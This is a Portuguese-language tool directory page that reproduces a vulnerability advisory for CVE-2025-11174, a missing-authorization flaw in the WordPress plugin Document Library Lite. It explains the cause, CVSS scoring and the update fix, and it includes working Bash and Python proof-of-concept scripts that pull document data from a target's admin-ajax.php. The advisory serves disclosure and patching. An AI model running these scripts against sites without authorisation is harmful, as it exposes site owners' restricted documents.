Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Autorização Ausente para Exposição de Informações Sensíveis | CVE-2025-11174 | Kitploit
Ferramentas/GitHubGitHub/snailsploit/cve-2025-11174
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de Penetração
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Autorização Ausente para Exposição de Informações Sensíveis | CVE-2025-11174

Ver Repositório
4há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-11174: Divulgação Não Autenticada de Informações no Plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Palavras-chave: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

Sumário

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Análise Técnica
  • Vetor de Ataque
  • Prova de Conceito
  • Guia de Remediação
  • Detecção
  • Métricas CVSS
  • Referências
  • Créditos
  • Contato de Segurança

Visão Geral

Vulnerabilidade de Divulgação de Informações no Plugin WordPress Document Library Lite (CVE-2025-11174) – Falha de segurança que permite acesso não autenticado a dados confidenciais de documentos no plugin de biblioteca de documentos do WordPress.

Foi descoberta uma vulnerabilidade crítica de bypass de autorização no Plugin WordPress Document Library Lite que permite que atacantes não autenticados acessem informações confidenciais de documentos sem a devida autenticação.

Descoberto por: Kai Aizen & Avraham Shemesh (SnailSploit)
Publicado: 1 de novembro de 2025
Pontuação CVSS: 5.3 (Médio)
CWE: CWE-862 – Autorização Ausente
Plugin: Document Library Lite
Fornecedor: Barn2 Plugins
Tipo de Ataque: Divulgação de Informações Não Autenticada
Privilégios Necessários: Nenhum (Ataque Não Autenticado)

Detalhes da Vulnerabilidade

Descrição

O plugin Document Library Lite para WordPress contém uma vulnerabilidade de autorização inadequada em todas as versões até a 1.1.6 inclusive. O plugin expõe uma ação AJAX não autenticada dll_load_posts que retorna uma tabela JSON de dados de documentos sem realizar verificações de nonce ou capacidade.

Impacto

Esta vulnerabilidade permite que atacantes não autenticados:

  • Acessem metadados de documentos sem autorização
  • Recuperem listagens de documentos que deveriam ser restritas
  • Visualizem informações de documentos destinadas apenas a usuários autenticados
  • Enumerem documentos armazenados na Document Library

Nota: A pontuação CVSS de 5.3 (gravidade Média) reflete divulgação limitada de informações. Embora a vulnerabilidade permita acesso não autenticado aos dados de documentos, o impacto é classificado como Baixo para confidencialidade, sem impacto na integridade ou disponibilidade.

Versões Afetadas

  • Vulnerável: Todas as versões ≤ 1.1.6
  • Corrigido: Versão 1.1.7 e superiores

Métricas CVSS v3.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
MétricaValor
Vetor de AtaqueRede (AV:N)
Complexidade do AtaqueBaixa (AC:L)
Privilégios NecessáriosNenhum (PR:N)
Interação do UsuárioNenhuma (UI:N)
EscopoInalterado (S:U)
ConfidencialidadeBaixa (C:L)
IntegridadeNenhum (I:N)
DisponibilidadeNenhum (A:N)

Detalhamento CVSS v3.1:

  • Vetor de Ataque (AV): Rede – A vulnerabilidade pode ser explorada remotamente através de uma rede
  • Complexidade do Ataque (AC): Baixa – Nenhuma condição especial é necessária para exploração
  • Privilégios Necessários (PR): Nenhum – Nenhuma autenticação ou privilégios são necessários
  • Interação do Usuário (UI): Nenhuma – O exploit funciona sem qualquer interação do usuário
  • Escopo (S): Inalterado – A vulnerabilidade afeta apenas o componente vulnerável
  • Impacto na Confidencialidade (C): Baixo – Divulgação limitada de informações
  • Impacto na Integridade (I): Nenhum – Sem impacto na integridade
  • Impacto na Disponibilidade (A): Nenhum – Sem impacto na disponibilidade

Análise Técnica

Causa Raiz da Vulnerabilidade

A ação AJAX dll_load_posts é registrada sem verificações adequadas de autenticação ou autorização:

// Padrão de código vulnerável (simplificado)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

O prefixo wp_ajax_nopriv_ indica que esta ação é acessível a usuários não autenticados, e a função de retorno não implementa:

  • Verificação de nonce
  • Verificações de capacidade
  • Validação de autenticação do usuário

Vetor de Ataque

POST /wp-admin/admin-ajax.php
action=dll_load_posts

A vulnerabilidade pode ser explorada através do endpoint admin-ajax.php do WordPress sem autenticação.

Prova de Conceito

⚠️ Apenas para Fins Educacionais e de Teste Autorizados

PoC em Bash

#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

PoC em Python

#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Remediação

Para Administradores de Sites

Ação Imediata Necessária:

  1. Atualize para a versão 1.1.7 ou superior do Document Library Lite imediatamente
  2. Revise os logs de acesso do seu site em busca de requisições POST suspeitas para admin-ajax.php com action=dll_load_posts
  3. Se não puder atualizar imediatamente, considere desativar temporariamente o plugin

Instruções de Atualização

Baixar ferramenta